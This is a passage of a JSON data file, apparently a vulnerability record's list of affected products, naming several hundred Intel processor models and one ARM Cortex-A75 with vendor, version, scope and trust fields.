"xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2667_v2" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5647" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "920xm" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3120me" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5015u" }, { "model": "xeon e5 2407", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6500" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8160m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2537m" }, { "model": "xeon e3 1501l v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8893_v3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4220y" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4650l" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x7560" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6100te" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "ec5549" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4650u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7700hq" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4300m" }, { "model": "atom e", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e3826" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6100e" }, { "model": "xeon e5 2470", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4700ec" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2810" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5850eq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5850hq" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3770" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3735g" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "540m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4690" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3770k" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6500t" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2320" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2530" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3470" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6400" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2600s" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3480" }, { "model": "xeon e5 2650 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core m", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5y71" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3245" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3570" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4410e" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6685r" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8880l_v2" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4170" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5560" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5650" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "520e" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4667_v3" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3450" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5575r" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2550k" }, { "model": "xeon e5 2430", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3736g" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2803" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4600m" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4607_v2" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2100t" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3795" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4700mq" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4202y" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7660u" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5005u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2660_v2" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8880_v2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3612qe" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5672" }, { "model": "xeon e5 2430 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4250u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7920hq" }, { "model": "xeon e3 1245", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3437u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2658_v4" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4720hq" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2658_v2" }, { "model": "xeon e5 2650l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2310m" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2518" }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j1900" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2310" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2699a_v4" }, { "model": "xeon e5 2603 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2628l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1278l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8160f" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4702hq" }, { "model": "xeon e5 2620", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6144" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3200rk" }, { "model": "xeon e3 1240 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core m5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6y54" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3210" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4350t" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7210f" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3130m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3615qm" }, { "model": "core m", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5y10a" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5570" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "870s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2405s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3550s" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5660" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4640_v4" }, { "model": "xeon e5 2643 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4010y" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8153" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3130" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4830_v4" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3689y" }, { "model": "xeon e3 1270", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2680_v3" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3708" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "840qm" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4610_v4" }, { "model": "xeon e3 1245 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2408l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2358" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2710qe" }, { "model": "pentium n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3540" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8891_v4" }, { "model": "xeon e5 2428l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2650l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6100t" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "560m" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2375m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4200h" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x7542" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4620" }, { "model": "xeon e5 2640", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4810mq" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2920" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4830" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4210h" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4360t" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4340" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "370m" }, { "model": "xeon e5 1680 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4112e" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3060" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2697a_v4" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6152" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "680" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5350h" }, { "model": "xeon e3 1220l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4607" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3745" }, { "model": "xeon e5 2428l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5640" }, { "model": "xeon e5 2637 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2677m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5500u" }, { "model": "xeon e3 1240 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4617" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4667_v4" }, { "model": "xeon e3 1275 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1225", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6600k" }, { "model": "xeon e3 1275l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "975" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4000m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "920" }, { "model": "xeon e5 2637 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8893_v2" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x3450" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3610qm" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2680_v2" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4402e" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6600" }, { "model": "xeon e5 2650 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8164" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5530" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2697_v4" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3808" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8158" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4460t" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4260u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4650_v2" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6360u" }, { "model": "xeon e3 1220 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2683_v3" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3538" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2760qm" }, { "model": "pentium n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3710" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2300" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3775" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2508" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3445" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7235" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "w3670" }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4114" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4690s" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4710mq" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3735e" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8170m" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5680" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z2460" }, { "model": "xeon e5 2620 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8860_v4" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3610me" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6130t" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3475s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8600k" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3775d" }, { "model": "xeon e3 1125c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4005u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2610ue" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7820hq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3517ue" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2870_v2" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4330t" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4210y" }, { "model": "xeon e5 2648l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1275", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2700k" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4600u" }, { "model": "xeon e5 1650 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2450 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4310u" }, { "model": "cortex-a", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": "75" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6138f" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "860s" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3115c" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "660lm" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4785t" }, { "model": "xeon e3 1230l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8870" }, { "model": "xeon e3 1270 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4288u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2637m" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3570" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2316" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2125" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3330s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4590t" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6600t" }, { "model": "core m", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5y70" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5609" }, { "model": "xeon e5 2609", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2630 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2630l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1558l_v5" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2629m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5600u" }, { "model": "xeon bronze 3106", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "980x" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4760hq" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3770d" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "460m" }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j3355" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6126t" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3590" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4350" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5700hq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2600k" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2516" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4210m" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5677" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4110m" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8890_v4" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5502" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5620" }, { "model": "xeon e5 2440 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6128" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3210m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4770r" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8176" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3858" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4650_v4" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n4100" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6300hq" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5606" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z2580" }, { "model": "xeon e5 2623 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4500u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4770te" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3615qe" }, { "model": "xeon e3 1290", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core m", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5y31" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7560u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5950hq" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2698_v3" }, { "model": "pentium j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j4205" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "640lm" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2880_v2" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2667_v4" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4200u" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "w5590" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4170t" }, { "model": "xeon e5 2450l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3360m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4310m" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3558" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "450m" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6300" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4700hq" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4628l_v4" }, { "model": "xeon e5 1620 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2870" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8894_v4" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2130" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1545m_v5" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4610_v2" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6140m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2630qm" }, { "model": "xeon e3 1240 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2637 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2102" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2750" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4590s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2510e" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6320" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2860qm" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4660_v3" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3205rk" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7700k" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e7520" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n4000" }, { "model": "core m", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5y10c" }, { "model": "pentium n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3530" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4430" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "960" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4030y" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2675qm" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7700" }, { "model": "xeon e3 1285 v4", 